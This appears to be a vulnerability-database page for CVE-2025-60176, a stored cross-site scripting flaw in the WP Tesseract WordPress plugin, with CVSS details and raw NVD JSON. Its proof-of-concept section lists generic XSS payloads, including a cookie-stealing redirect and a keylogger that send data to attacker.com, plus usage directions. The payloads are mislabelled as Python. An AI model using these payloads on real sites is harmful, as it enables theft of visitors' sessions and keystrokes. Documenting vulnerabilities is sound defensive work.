Security Vulnerability Report
中文
CVE-2025-60176 CVSS 5.9 MEDIUM

CVE-2025-60176

Published: 2025-10-22 15:15:58
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in tattersoftware WP Tesseract wp-tesseract allows Stored XSS.This issue affects WP Tesseract: from n/a through <= 1.0.2.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

WP Tesseract <= 1.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Stored XSS PoC for CVE-2025-60176 --> <!-- Attack requires high privilege (admin/editor) --> <!-- Payload 1: Basic script injection --> <script>alert(document.cookie)</script> <!-- Payload 2: Event handler based XSS --> <img src=x onerror=alert('XSS')> <!-- Payload 3: Cookie stealing payload --> <script>document.location='https://attacker.com/steal?c='+document.cookie</script> <!-- Payload 4: Keylogger --> <script>document.onkeypress=function(e){fetch('https://attacker.com/log?k='+e.key)}</script> <!-- Usage: Inject one of the above payloads into WP Tesseract plugin input fields --> <!-- The payload will be stored and executed when other users view the affected page -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60176", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:57.583", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in tattersoftware WP Tesseract wp-tesseract allows Stored XSS.This issue affects WP Tesseract: from n/a through <= 1.0.2."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.7, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-tesseract/vulnerability/wordpress-wp-tesseract-plugin-1-0-2-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}